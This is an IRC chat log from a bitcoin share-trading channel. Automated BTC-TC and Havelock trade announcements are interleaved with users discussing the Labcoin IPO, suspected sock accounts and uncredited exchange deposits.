[AM100] 2 @ 0.0395 = 0.079 BTC [+] Jul 31 21:34:05 [HAVELOCK] [SMG] 1 @ 0.0002693 BTC [+] Jul 31 21:34:08 [HAVELOCK] [AM100] 2 @ 0.0399 = 0.0798 BTC [+] Jul 31 21:34:13 try refreshing over and over Jul 31 21:34:14 try it now Jul 31 21:34:30 [BTCTC] [BASIC-MINING] 20 @ 0.615 = 12.3 BTC [+] Jul 31 21:34:31 still waiting on the last request to fail Jul 31 21:34:33 [BTCTC] [ASICMINER-PT] 4 @ 3.9 = 15.6 BTC [+] Jul 31 21:34:46 [BTCTC] [DMS.MINING] 20 @ 0.008073 = 0.1615 BTC [+] Jul 31 21:34:47 [BTCTC] [ACTIVEMINING] 2500 @ 0.0045 = 11.25 BTC [+] Jul 31 21:34:49 [BTCTC] [TAT.ASICMINER] 8 @ 0.0381 = 0.3048 BTC [-] Jul 31 21:34:50 [BTCTC] [ACTIVEMINING] 25 @ 0.004101 = 0.1025 BTC [-] Jul 31 21:34:51 [HAVELOCK] [AM100] 1 @ 0.0399999 BTC [+] Jul 31 21:34:51 mine died while scheduling divs Jul 31 21:34:52 [BTCTC] [COGNITIVE] 3 @ 0.41 = 1.23 BTC [+] Jul 31 21:34:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.0381 = 0.1524 BTC [-] Jul 31 21:34:54 [BTCTC] [ASICMINER-PT] 4 @ 3.863 = 15.452 BTC [-] Jul 31 21:34:56 [BTCTC] [DMS.SELLING] 50 @ 0.02191 = 1.0955 BTC [-] Jul 31 21:34:57 [BTCTC] [LTC-ATF.B2] 1 @ 0.01011 BTC [-] Jul 31 21:35:16 [BTCTC] [ACTIVEMINING] 24 @ 0.0045 = 0.108 BTC [+] Jul 31 21:35:28 i am loosing the positions :( Jul 31 21:35:31 [BTCTC] [COGNITIVE] 2 @ 0.41 = 0.82 BTC [+] Jul 31 21:35:32 [BTCTC] [ASICMINER-PT] 5 @ 3.863 = 19.315 BTC [-] Jul 31 21:35:35 [BTCTC] [LTC-ATF.B2] 470 @ 0.0101 = 4.747 BTC [-] Jul 31 21:35:37 [BTCTC] [ACTIVEMINING] 6 @ 0.004101 = 0.0246 BTC [-] Jul 31 21:35:41 this is becoming costly as fuck Jul 31 21:35:48 whats that? Jul 31 21:35:55 [BTCTC] [LTC-ATF.B2] 25 @ 0.01006 = 0.2515 BTC [-] Jul 31 21:35:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.03802 = 0.1901 BTC [-] Jul 31 21:35:58 [BTCTC] [ACTIVEMINING] 50 @ 0.0041 = 0.205 BTC [-] Jul 31 21:36:10 [BTCTC] [LTC-ATF.B2] 10 @ 0.01005 = 0.1005 BTC [-] Jul 31 21:36:11 [BTCTC] [DMS.SELLING] 90 @ 0.02191 = 1.9719 BTC [-] Jul 31 21:36:13 [BTCTC] [ACTIVEMINING] 5 @ 0.004031 = 0.0202 BTC [-] Jul 31 21:36:14 [BTCTC] [TAT.ASICMINER] 6 @ 0.03802 = 0.2281 BTC [-] Jul 31 21:36:20 [BTCTC] [LTC-ATF.B2] 1 @ 0.01001 BTC [-] Jul 31 21:36:21 [BTCTC] [DMS.SELLING] 20 @ 0.02191 = 0.4382 BTC [-] Jul 31 21:36:22 [BTCTC] [TAT.ASICMINER] 48 @ 0.03801 = 1.8245 BTC [-] Jul 31 21:36:24 [BTCTC] [ACTIVEMINING] 10 @ 0.00403 = 0.0403 BTC [-] Jul 31 21:36:29 [BTCTC] [ASICMINER-PT] 5 @ 3.863 = 19.315 BTC [-] Jul 31 21:36:32 15.8mil orders @ .001+ so far Jul 31 21:36:43 [BTCTC] [DMS.SELLING] 5 @ 0.0219 = 0.1095 BTC [-] Jul 31 21:36:48 [BTCTC] [TAT.ASICMINER] 15 @ 0.03751 = 0.5627 BTC [-] Jul 31 21:36:50 [BTCTC] [LTC-ATF.B2] 493 @ 0.010001 = 4.9305 BTC [-] Jul 31 21:36:54 [BTCTC] [DMS.SELLING] 30 @ 0.02184 = 0.6552 BTC [-] Jul 31 21:36:55 [BTCTC] [TAT.ASICMINER] 25 @ 0.0375 = 0.9375 BTC [-] Jul 31 21:37:02 costly like DT not paying out SDICE yet? Jul 31 21:37:12 [BTCTC] [DMS.SELLING] 40 @ 0.0217 = 0.868 BTC [-] Jul 31 21:37:17 [BTCTC] [DMS.SELLING] 15 @ 0.02151 = 0.3227 BTC [-] Jul 31 21:37:53 [BTCTC] [DMS.SELLING] 20 @ 0.0217 = 0.434 BTC [+] Jul 31 21:37:54 [BTCTC] [ASICMINER-PT] 5 @ 3.862 = 19.31 BTC [-] Jul 31 21:38:19 uh, when is the btcgarden ipo starting? Jul 31 21:38:26 [BTCTC] [DMS.SELLING] 30 @ 0.02151 = 0.6453 BTC [-] Jul 31 21:38:30 its dead in the water imo Jul 31 21:38:30 [BTCTC] [ASICMINER-PT] 5 @ 3.862 = 19.31 BTC [-] Jul 31 21:38:41 labcoin got all the attention Jul 31 21:38:46 and will sell out Jul 31 21:38:50 yea Jul 31 21:38:56 no one will have enough brainpower or coin left Jul 31 21:38:57 [BTCTC] [ASICMINER-PT] 11 @ 3.86 = 42.46 BTC [-] Jul 31 21:39:00 for btcgarden Jul 31 21:39:07 you got it Jul 31 21:39:13 and garden wants way more coin right? Jul 31 21:39:19 btcgarden? labcoin? btc powered weed grow ops to power sr? Jul 31 21:39:19 :) Jul 31 21:39:33 [BTCTC] [ASICMINER-PT] 10 @ 3.85 = 38.5 BTC [-] Jul 31 21:39:59 [BTCTC] [BASIC-MINING] 12 @ 0.352 = 4.224 BTC [-] Jul 31 21:40:04 isnt that labcoin highly overpriced Jul 31 21:40:05 but is there any fixed time yet like labcoin or did i miss sth? Jul 31 21:40:16 i didnt read some of the 1k pages Jul 31 21:40:17 [BTCTC] [ACTIVEMINING] 25 @ 0.00403 = 0.1008 BTC [-] Jul 31 21:40:25 [BTCTC] [ACTIVEMINING] 40 @ 0.004029 = 0.1612 BTC [-] Jul 31 21:40:26 Chaang-Noi: i knew you would say that here soon Jul 31 21:40:29 thats why i woke up here too Jul 31 21:40:45 Chaang-Noi: big risks, big losses :I Jul 31 21:40:51 https://bitcointalk.org/index.php?topic=263445.0 Jul 31 21:40:54 20000 of what Jul 31 21:41:01 20k usd Jul 31 21:41:02 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 31 21:41:03 ^ burnside outlined the process Jul 31 21:41:06 [BTCTC] [COGNITIVE] 10 @ 0.7 = 7 BTC [+] Jul 31 21:41:09 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Jul 31 21:41:15 [HAVELOCK] [SDSTM] 2 @ 0.00888 = 0.0178 BTC [-] Jul 31 21:41:18 [BTCTC] [BASIC-MINING] 8 @ 0.352 = 2.816 BTC [-] Jul 31 21:41:19 Chaang-Noi: yeah. but it was a nice try though Jul 31 21:41:20 [BTCTC] [ACTIVEMINING] 70 @ 0.0041 = 0.287 BTC [+] Jul 31 21:41:21 [BTCTC] [ASICMINER-PT] 1 @ 3.83 BTC [-] Jul 31 21:41:23 [BTCTC] [BASIC-MINING] 3 @ 0.352 = 1.056 BTC [-] Jul 31 21:41:27 16000btc in bids for labcoin Jul 31 21:41:27 [BTCTC] [ASICMINER-PT] 2 @ 3.83 = 7.66 BTC [-] Jul 31 21:41:28 [BTCTC] [ACTIVEMINING] 275 @ 0.004028 = 1.1077 BTC [-] Jul 31 21:41:41 jurov i meant btcgarden. i know the labcoin process. Jul 31 21:41:41 [BTCTC] [BASIC-MINING] 2 @ 0.351 = 0.702 BTC [-] Jul 31 21:41:49 [BTCTC] [ACTIVEMINING] 100 @ 0.004027 = 0.4027 BTC [-] Jul 31 21:41:51 good. Jul 31 21:41:51 [BTCTC] [BASIC-MINING] 40 @ 0.35 = 14 BTC [-] Jul 31 21:41:52 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 31 21:41:55 [BTCTC] [ACTIVEMINING] 175 @ 0.004027 = 0.7047 BTC [-] Jul 31 21:42:02 [BTCTC] [BASIC-MINING] 1 @ 0.3376 BTC [-] Jul 31 21:42:06 [BTCTC] [ACTIVEMINING] 275 @ 0.004027 = 1.1074 BTC [-] Jul 31 21:42:06 gambling big sums is bad Jul 31 21:42:06 [BTCTC] [COGNITIVE] 21 @ 0.4399 = 9.2379 BTC [-] Jul 31 21:42:07 [BTCTC] [BASIC-MINING] 15 @ 0.332 = 4.98 BTC [-] Jul 31 21:42:15 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 31 21:42:17 Chaang-Noi: You need a big bankroll and you can beat the variance. Jul 31 21:42:17 i mean, gambling for profit.. it's bad Jul 31 21:42:18 [BTCTC] [BASIC-MINING] 35 @ 0.3311 = 11.5885 BTC [-] Jul 31 21:42:19 [BTCTC] [ACTIVEMINING] 40 @ 0.004027 = 0.1611 BTC [-] Jul 31 21:42:21 Wednesdays are already full days for me with ASICMINER-PT related duties and my day job. Jul 31 21:42:24 a guy won 4700BTC with a 10K BTC deposit. Jul 31 21:42:24 [HAVELOCK] [HIM] 3 @ 0.151 = 0.453 BTC [+] Jul 31 21:42:28 what exact am=pt duties he have ? Jul 31 21:42:35 [BTCTC] [BASIC-MINING] 8 @ 0.3201 = 2.5608 BTC [-] Jul 31 21:42:36 [HAVELOCK] [HIM] 10 @ 0.139 = 1.39 BTC [-] Jul 31 21:42:39 [HAVELOCK] [SDSTM] 1 @ 0.00889 BTC [+] Jul 31 21:42:42 [BTCTC] [BASIC-MINING] 2 @ 0.32 = 0.64 BTC [-] Jul 31 21:42:42 mircea_popescu: that happens when your exchange isn't automatize Jul 31 21:42:43 d Jul 31 21:42:45 lol Jul 31 21:42:50 FUCK ASSBOT AND THAT SPAM Jul 31 21:42:50 for burnside? Jul 31 21:42:52 eys Jul 31 21:42:55 what time is it CENTRAL ? Jul 31 21:42:55 waiting til night Jul 31 21:43:02 then sending divs Jul 31 21:43:03 [BTCTC] [ACTIVEMINING] 797 @ 0.0041 = 3.2677 BTC [+] Jul 31 21:43:03 bigbitz: approx 1 hour Jul 31 21:43:04 pretty easy Jul 31 21:43:10 [BTCTC] [ASICMINER-PT] 2 @ 3.861 = 7.722 BTC [+] Jul 31 21:43:15 Chaang-Noi: it was a quote from bct Jul 31 21:43:26 oh he processes share xfers too Jul 31 21:43:29 in and out of exchange Jul 31 21:43:34 irc is hard when you're new Jul 31 21:44:44 [BTCTC] [ASICMINER-PT] 5 @ 3.85 = 19.25 BTC [-] Jul 31 21:45:59 [BTCTC] [ACTIVEMINING] 243 @ 0.004337 = 1.0539 BTC [+] Jul 31 21:46:11 [BTCTC] [ACTIVEMINING] 10 @ 0.004343 = 0.0434 BTC [+] Jul 31 21:46:24 [BTCTC] [ACTIVEMINING] 5 @ 0.004429 = 0.0221 BTC [+] Jul 31 21:46:40 [BTCTC] [ACTIVEMINING] 50 @ 0.004431 = 0.2216 BTC [+] Jul 31 21:46:46 [BTCTC] [ACTIVEMINING] 150 @ 0.00444 = 0.666 BTC [+] Jul 31 21:46:47 [HAVELOCK] [SDSTM] 1 @ 0.00889 BTC [+] Jul 31 21:46:53 [BTCTC] [ACTIVEMINING] 441 @ 0.004449 = 1.962 BTC [+] Jul 31 21:47:03 [BTCTC] [ACTIVEMINING] 560 @ 0.004498 = 2.5189 BTC [+] Jul 31 21:47:07 [HAVELOCK] [AM100] 4 @ 0.04 = 0.16 BTC [+] Jul 31 21:47:09 go on Jul 31 21:47:12 [BTCTC] [ACTIVEMINING] 50 @ 0.004498 = 0.2249 BTC [+] Jul 31 21:47:16 "Labcoin started out as a privately funded experiment, managed by iTec-Pro Limited back in September/October 2012, with the aim of exploring the development of novel mining technologies." Jul 31 21:47:20 fucken bs. Jul 31 21:48:18 100 post forum sock registered two months ago. Jul 31 21:48:24 that's all that's motherfucking needed already. Jul 31 21:48:38 http://www.linkedin.com/company/itec-pro-limited Jul 31 21:48:39 iTec Pro Limited | LinkedIn Jul 31 21:48:43 [BTCTC] [COGNITIVE] 25 @ 0.7 = 17.5 BTC [+] Jul 31 21:48:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.03885 = 0.3885 BTC [+] Jul 31 21:49:04 [BTCTC] [ACTIVEMINING] 625 @ 0.004498 = 2.8113 BTC [+] Jul 31 21:49:12 [HAVELOCK] [SMG] 18 @ 0.0002693 = 0.0048 BTC [+] Jul 31 21:49:28 so what happens in this case, the IPO deflates immediately? Jul 31 21:49:35 [BTCTC] [ACTIVEMINING] 375 @ 0.004499 = 1.6871 BTC [+] Jul 31 21:49:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.03801 = 0.2661 BTC [-] Jul 31 21:49:40 i mean youve got 16000btc on a 7000btc IPO Jul 31 21:49:44 [BTCTC] [TAT.ASICMINER] 12 @ 0.03801 = 0.4561 BTC [-] Jul 31 21:49:46 split proportionally Jul 31 21:49:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.038 = 0.57 BTC [-] Jul 31 21:49:53 [BTCTC] [TAT.ASICMINER] 50 @ 0.03761 = 1.8805 BTC [-] Jul 31 21:50:00 "Our Company trade in well known consumer electronic brands mainly from China." Jul 31 21:50:01 this means a bajillion shares waiting to be flipped Jul 31 21:50:02 seriously ? Jul 31 21:50:13 i guess engineers cunt speal. Jul 31 21:50:29 [BTCTC] [TAT.ASICMINER] 100 @ 0.0376 = 3.76 BTC [-] Jul 31 21:50:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.03752 = 0.2626 BTC [-] Jul 31 21:50:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.0375 = 0.1875 BTC [-] Jul 31 21:50:59 They sell on eBay :) Jul 31 21:51:10 They sell BluRays and Samsung BluRay players :D Jul 31 21:51:18 lulz Jul 31 21:51:27 [HAVELOCK] [SDSTM] 1 @ 0.00889 BTC [+] Jul 31 21:51:52 BigBitz i know. Jul 31 21:52:09 [BTCTC] [ACTIVEMINING] 395 @ 0.004499 = 1.7771 BTC [+] Jul 31 21:52:20 They're pumping 130nm ASIC.............. Jul 31 21:52:31 only on retardtalk. Jul 31 21:53:13 [BTCTC] [ACTIVEMINING] 455 @ 0.0043 = 1.9565 BTC [-] Jul 31 21:53:16 [HAVELOCK] [SMG] 7 @ 0.0002693 = 0.0019 BTC [+] Jul 31 21:53:19 [BTCTC] [ACTIVEMINING] 30 @ 0.004202 = 0.1261 BTC [-] Jul 31 21:53:24 [BTCTC] [ACTIVEMINING] 1015 @ 0.0042 = 4.263 BTC [-] Jul 31 21:53:55 https://bitcointalk.org/index.php?topic=263445.msg2841315#msg2841315 Jul 31 21:54:02 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Jul 31 21:54:03 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 31 21:54:47 [HAVELOCK] [AM100] 1 @ 0.04 BTC [+] Jul 31 21:56:15 someone should read that thread side by side wit hthe s.dice thread Jul 31 21:56:25 ppl going all "o noes, too high p/e" Jul 31 21:57:17 [BTCTC] [ACTIVEMINING] 565 @ 0.004203 = 2.3747 BTC [+] Jul 31 21:57:52 [BTCTC] [TAT.ASICMINER] 13 @ 0.03749 = 0.4874 BTC [-] Jul 31 21:59:55 ok so what are the odds that like 9000btc of these bids are the issuer? Jul 31 22:00:09 and this was the scam all along Jul 31 22:00:55 ThickAsThieves zilch. Jul 31 22:00:59 http://bitcoinminingreview.com/ann-labcoin-asic-v-1-65nm433mhz-v-2-65nm-european-chinese/ Jul 31 22:01:01 random fuckwit does not have 9k btc Jul 31 22:01:04 [ANN] labcoin ASIC – v.1 @65nm/433Mhz – v.2 @65nm – European / Chinese… | Bitcoin Mining Rev Jul 31 22:01:07 the only weay this happened is if burnisde faked bids. Jul 31 22:01:36 Story of the century, burnside aids ipos with fake bits for a 25% take! Jul 31 22:01:47 dafuck is thast spamsite dexX7 ? Jul 31 22:01:50 heh Jul 31 22:01:54 lets not start spreading rumors Jul 31 22:01:57 why is AM tanking pre-dividend? Jul 31 22:02:06 Everything is Jul 31 22:02:08 naemsi: a. lower divs Jul 31 22:02:18 b. ppl selling to buy shit like labcoin Jul 31 22:02:39 see the headline? v1 65 nm/433 mhz Jul 31 22:02:40 i can say i have seen a large amount of btc leave Jul 31 22:02:50 in the last 30hrs Jul 31 22:03:11 most everyone says for labcoin Jul 31 22:03:30 it's 130 nn @ 300 mhz Jul 31 22:03:35 *now Jul 31 22:03:49 glad i had the sense to sell amc at 0.0095 Jul 31 22:03:54 supposedly thers 17k in the buy book Jul 31 22:04:01 i don't always listen to my gut Jul 31 22:04:13 [BTCTC] [ACTIVEMINING] 365 @ 0.00444 = 1.6206 BTC [+] Jul 31 22:04:31 [BTCTC] [ACTIVEMINING] 565 @ 0.004697 = 2.6538 BTC [+] Jul 31 22:04:33 [BTCTC] [ACTIVEMINING] 25 @ 0.004698 = 0.1175 BTC [+] Jul 31 22:04:37 [BTCTC] [ACTIVEMINING] 1810 @ 0.0047 = 8.507 BTC [+] Jul 31 22:04:44 [BTCTC] [ASICMINER-PT] 3 @ 3.85 = 11.55 BTC [-] Jul 31 22:05:13 [BTCTC] [ACTIVEMINING] 25 @ 0.004302 = 0.1076 BTC [-] Jul 31 22:07:20 so 7k will get filled Jul 31 22:07:27 then 10k will get spent on top Jul 31 22:07:28 [HAVELOCK] [AM100] 1 @ 0.03900001 BTC [-] Jul 31 22:07:30 post-ipo Jul 31 22:07:34 [BTCTC] [ASICMINER-PT] 1 @ 3.844 BTC [-] Jul 31 22:07:35 [BTCTC] [TAT.ASICMINER] 85 @ 0.0373 = 3.1705 BTC [-] Jul 31 22:07:41 thoughts on that ThickAsThieves? Jul 31 22:07:44 [BTCTC] [ASICMINER-PT] 1 @ 3.843 BTC [-] Jul 31 22:07:54 this means it will be a glorious bubble and/or every other stock will go back up Jul 31 22:08:08 heh Jul 31 22:08:40 lol Jul 31 22:09:12 [HAVELOCK] [AM100] 18 @ 0.0399999 = 0.72 BTC [+] Jul 31 22:09:34 [BTCTC] [ASICMINER-PT] 5 @ 3.851 = 19.255 BTC [+] Jul 31 22:09:57 one for the history books Jul 31 22:10:17 [BTCTC] [ASICMINER-PT] 5 @ 3.851 = 19.255 BTC [+] Jul 31 22:10:28 i guess this is where we see the addies with all that btc going in. Jul 31 22:11:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.03729 = 0.5594 BTC [-] Jul 31 22:11:58 [BTCTC] [ASICMINER-PT] 5 @ 4.6 = 23 BTC [+] Jul 31 22:12:01 [BTCTC] [TAT.ASICMINER] 12 @ 0.0371 = 0.4452 BTC [-] Jul 31 22:12:37 tat Jul 31 22:12:41 https://bitcointalk.org/index.php?topic=264968.0 Jul 31 22:12:45 [IPO] [BTC-TC] [BITFUNDER] CasinoBitco.in - Raising Bankroll for Football Jul 31 22:12:49 500k ish valuation? Jul 31 22:13:12 heh. Jul 31 22:13:21 i assume they are trolling Jul 31 22:13:24 [BTCTC] [ACTIVEMINING] 25 @ 0.004298 = 0.1075 BTC [-] Jul 31 22:13:26 so basicallty... everyone posting on that thread is a sock. provably so. Jul 31 22:13:28 [BTCTC] [ACTIVEMINING] 17 @ 0.004299 = 0.0731 BTC [+] Jul 31 22:13:31 burnside: any comment about the missing BTC issue? Jul 31 22:13:33 [BTCTC] [ACTIVEMINING] 158 @ 0.0043 = 0.6794 BTC [+] Jul 31 22:14:00 [BTCTC] [ASICMINER-PT] 1 @ 3.848 BTC [-] Jul 31 22:14:02 [BTCTC] [TAT.ASICMINER] 24 @ 0.03748 = 0.8995 BTC [+] Jul 31 22:14:40 [BTCTC] [ASICMINER-PT] 4 @ 3.848 = 15.392 BTC [-] Jul 31 22:14:46 [BTCTC] [ASICMINER-PT] 1 @ 3.845 BTC [-] Jul 31 22:15:04 [BTCTC] [ASICMINER-PT] 4 @ 3.844 = 15.376 BTC [-] Jul 31 22:15:33 frb: missing btc issue? Jul 31 22:15:42 [BTCTC] [ACTIVEMINING] 13 @ 0.004299 = 0.0559 BTC [-] Jul 31 22:15:42 [BTCTC] [ASICMINER-PT] 1 @ 3.844 BTC [-] Jul 31 22:15:46 [BTCTC] [ACTIVEMINING] 25 @ 0.004203 = 0.1051 BTC [-] Jul 31 22:15:48 [BTCTC] [ASICMINER-PT] 1 @ 3.843 BTC [-] Jul 31 22:15:51 [BTCTC] [ACTIVEMINING] 30 @ 0.004202 = 0.1261 BTC [-] Jul 31 22:15:54 [BTCTC] [ASICMINER-PT] 1 @ 3.821 BTC [-] Jul 31 22:15:56 [BTCTC] [ACTIVEMINING] 485 @ 0.0042 = 2.037 BTC [-] Jul 31 22:16:00 Ukyo: It's hard to say how many, but it seems like 20BTC+ have gone missing on BTC-TC Jul 31 22:16:01 [BTCTC] [ACTIVEMINING] 3 @ 0.004112 = 0.0123 BTC [-] Jul 31 22:16:02 [BTCTC] [ASICMINER-PT] 1 @ 3.811 BTC [-] Jul 31 22:16:07 [BTCTC] [ACTIVEMINING] 5 @ 0.00411 = 0.0206 BTC [-] Jul 31 22:16:08 [BTCTC] [ASICMINER-PT] 5 @ 3.81 = 19.05 BTC [-] Jul 31 22:16:13 [BTCTC] [ACTIVEMINING] 2 @ 0.004028 = 0.0081 BTC [-] Jul 31 22:16:15 [BTCTC] [ACTIVEMINING] 4 @ 0.004027 = 0.0161 BTC [-] Jul 31 22:16:17 Some people (myself including) deposited and our deposits were not credited Jul 31 22:16:19 [BTCTC] [ACTIVEMINING] 500 @ 0.004007 = 2.0035 BTC [-] Jul 31 22:16:25 [BTCTC] [ACTIVEMINING] 1 @ 0.004006 BTC [-] Jul 31 22:16:26 0,o Jul 31 22:16:30 [BTCTC] [ACTIVEMINING] 1000 @ 0.004006 = 4.006 BTC [-] Jul 31 22:16:46 i smell someone doing a runner soon Jul 31 22:16:50 btct backend under too much load Jul 31 22:17:00 [HAVELOCK] [AM100] 2 @ 0.03900001 = 0.078 BTC [-] Jul 31 22:17:03 [HAVELOCK] [AM100] 1 @ 0.0384 BTC [-] Jul 31 22:17:04 frb: when did this happen? Jul 31 22:17:05 [HAVELOCK] [AM100] 1 @ 0.03822 BTC [-] Jul 31 22:17:07 [HAVELOCK] [AM100] 40 @ 0.03821 = 1.5284 BTC [-] Jul 31 22:17:09 [HAVELOCK] [AM100] 1 @ 0.0382 BTC [-] Jul 31 22:17:10 delayed confirmations aren't very new Jul 31 22:17:16 Ukyo: http://blockchain.info/tx/782e5a896d85ac957adec6a2c79a5c15c6337a91010700988374eb685aa4562a Jul 31 22:17:18 its not the backend Jul 31 22:17:23 its the bitcoind Jul 31 22:17:24 This is the transaction that has still not been credited Jul 31 22:17:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03747 BTC [-] Jul 31 22:17:29 [BTCTC] [ASICMINER-PT] 1 @ 3.82 BTC [+] Jul 31 22:17:37 burns runs most stuff through bitcoind to track things. Jul 31 22:17:43 and it just cant handle that load Jul 31 22:17:48 hes been working to remove it Jul 31 22:17:50 [BTCTC] [ACTIVEMINING] 1 @ 0.004297 BTC [+] Jul 31 22:17:54 If that were the case it would see my 14 confirmations by now don't you think :) Jul 31 22:17:56 that's a horrible way to do it Jul 31 22:17:58 I think he turned off crediting Jul 31 22:18:00 https://bitcointalk.org/index.php?topic=125629.msg2841109#msg2841109 more than 5 ppl with the same problem Jul 31 22:18:09 Apocalyptic: yes. yes it is Jul 31 22:18:12 It showed 1/3 confirmations for a time Jul 31 22:18:14 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Jul 31 22:18:14 but hes trying to fix it Jul 31 22:18:25 [BTCTC] [ASICMINER-PT] 4 @ 4.55 = 18.2 BTC [+] Jul 31 22:18:28 frb: okay, so it started today Jul 31 22:18:32 a few hours ago Jul 31 22:18:36 ? Jul 31 22:18:40 correct Jul 31 22:18:41 not an ongoing issue from days ago? Jul 31 22:18:45 no Jul 31 22:18:55 iom sure hell fix it as soon as he has time to work on btct Jul 31 22:19:10 [BTCTC] [TAT.MINIGAME] 1 @ 0.00028 BTC [+] Jul 31 22:19:13 [BTCTC] [TAT.MINIGAME] 309 @ 0.0002724 = 0.0842 BTC [-] Jul 31 22:19:20 bitcoind is a part of btct's backend - or at least i meant it that way. - delays happend before but not at that degree Jul 31 22:19:21 [BTCTC] [TAT.MINIGAME] 200 @ 0.0002702 = 0.054 BTC [-] Jul 31 22:19:23 [BTCTC] [ASICMINER-PT] 5 @ 4.55 = 22.75 BTC [+] Jul 31 22:19:25 [BTCTC] [TAT.ASICMINER] 29 @ 0.03709 = 1.0756 BTC [-] Jul 31 22:19:51 Dammit the activemining channel turned the cluster that the forum is too Jul 31 22:19:59 turned into* Jul 31 22:20:01 bitcoind prolly crashed and his script somehow didnt catch the confirms on the transactions is my guess Jul 31 22:20:14 [BTCTC] [TAT.MINIGAME] 3000 @ 0.000265 = 0.795 BTC [-] Jul 31 22:21:31 [HAVELOCK] [AM100] 10 @ 0.038 = 0.38 BTC [-] Jul 31 22:21:58 [HAVELOCK] [HIM] 169 @ 0.139 = 23.491 BTC [-] Jul 31 22:22:08 so btcgarden getting the green light too? Jul 31 22:22:09 what a day Jul 31 22:22:20 [BTCTC] [GSDPT] 253 @ 0.003357 = 0.8493 BTC [+] Jul 31 22:22:21 16 million dollar valuation Jul 31 22:23:00 you wonder why sec gets involved in shit Jul 31 22:23:29 [BTCTC] [ACTIVEMINING] 25 @ 0.004014 = 0.1004 BTC [-] Jul 31 22:23:30 I wouldn't say investigating one case, as getting involved. Jul 31 22:23:33 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Jul 31 22:23:47 you don't think there's going to be alot more? Jul 31 22:23:49 [BTCTC] [ACTIVEMINING] 10 @ 0.004013 = 0.0401 BTC [-] Jul 31 22:23:51 including btct Jul 31 22:23:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.03747 BTC [+] Jul 31 22:24:00 [BTCTC] [ACTIVEMINING] 50 @ 0.004013 = 0.2007 BTC [-] Jul 31 22:24:03 Possible of course Jul 31 22:24:21 [BTCTC] [ACTIVEMINING] 50 @ 0.004011 = 0.2006 BTC [-] Jul 31 22:24:26 [BTCTC] [ACTIVEMINING] 95 @ 0.004001 = 0.3801 BTC [-] Jul 31 22:24:32 [BTCTC] [ACTIVEMINING] 4990 @ 0.004001 = 19.965 BTC [-] Jul 31 22:24:36 [HAVELOCK] [HIM] 10 @ 0.15 = 1.5 BTC [+] Jul 31 22:24:39 [BTCTC] [ACTIVEMINING] 100 @ 0.004002 = 0.4002 BTC [+] Jul 31 22:24:44 they're already investgating all of this, right now Jul 31 22:25:06 [HAVELOCK] [AM100] 1 @ 0.0399998 BTC [+] Jul 31 22:25:19 [BTCTC] [ASICMINER-PT] 3 @ 3.81 = 11.43 BTC [-] Jul 31 22:25:28 [BTCTC] [ASICMINER-PT] 1 @ 3.805 BTC [-] Jul 31 22:25:34 [BTCTC] [ASICMINER-PT] 10 @ 3.805 = 38.05 BTC [-] Jul 31 22:25:39 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Jul 31 22:25:43 just tragic really Jul 31 22:25:44 [BTCTC] [ASICMINER-PT] 2 @ 3.8 = 7.6 BTC [-] Jul 31 22:25:48 [BTCTC] [ASICMINER-PT] 3 @ 3.8 = 11.4 BTC [-] Jul 31 22:26:11 [HAVELOCK] [HIM] 3 @ 0.14 = 0.42 BTC [-] Jul 31 22:26:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.0371 = 0.1484 BTC [-] Jul 31 22:26:20 [BTCTC] [TAT.ASICMINER] 24 @ 0.0371 = 0.8904 BTC [-] Jul 31 22:26:28 [BTCTC] [ACTIVEMINING] 25 @ 0.004291 = 0.1073 BTC [+] Jul 31 22:27:09 [BTCTC] [TAT.ASICMINER] 27 @ 0.03709 = 1.0014 BTC [-] Jul 31 22:27:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.03701 = 0.3701 BTC [-] Jul 31 22:28:10 [BTCTC] [TAT.ASICMINER] 35 @ 0.03701 = 1.2954 BTC [-] Jul 31 22:28:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.03701 = 0.3701 BTC [-] Jul 31 22:28:31 LLLLAAAABBBBBCCCOOOOIIIIINNNNNN!!!!!!! Jul 31 22:28:47 [BTCTC] [TAT.ASICMINER] 20 @ 0.03747 = 0.7494 BTC [+] Jul 31 22:29:03 lol Jul 31 22:30:15 [HAVELOCK] [AM100] 4 @ 0.0380002 = 0.152 BTC [-] Jul 31 22:30:18 [HAVELOCK] [AM100] 1 @ 0.038 BTC [-] Jul 31 22:30:20 [HAVELOCK] [AM100] 3 @ 0.0377 = 0.1131 BTC [-] Jul 31 22:30:22 [HAVELOCK] [AM100] 2 @ 0.0373 = 0.0746 BTC [-] Jul 31 22:30:23 [HAVELOCK] [AM100] 97 @ 0.0370001 = 3.589 BTC [-] Jul 31 22:30:58 [HAVELOCK] [AM100] 1 @ 0.0399998 BTC [+] Jul 31 22:31:45 [BTCTC] [TAT.ASICMINER] 14 @ 0.03748 = 0.5247 BTC [+] Jul 31 22:32:47 [HAVELOCK] [HIM] 7 @ 0.14 = 0.98 BTC [-] Jul 31 22:32:49 [HAVELOCK] [HIM] 10 @ 0.145 = 1.45 BTC [+] Jul 31 22:33:02 ok.. after 3/3 confirmations on btct, coins do not show up in wallet Jul 31 22:33:08 other ppl are having same issues Jul 31 22:33:13 what's up Jul 31 22:33:18 27 mins to go :p Jul 31 22:33:24 [BTCTC] [BITVPS] 2 @ 0.001699 = 0.0034 BTC [-] Jul 31 22:33:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.03749 = 0.15 BTC [+] Jul 31 22:33:34 try making an order Jul 31 22:33:34 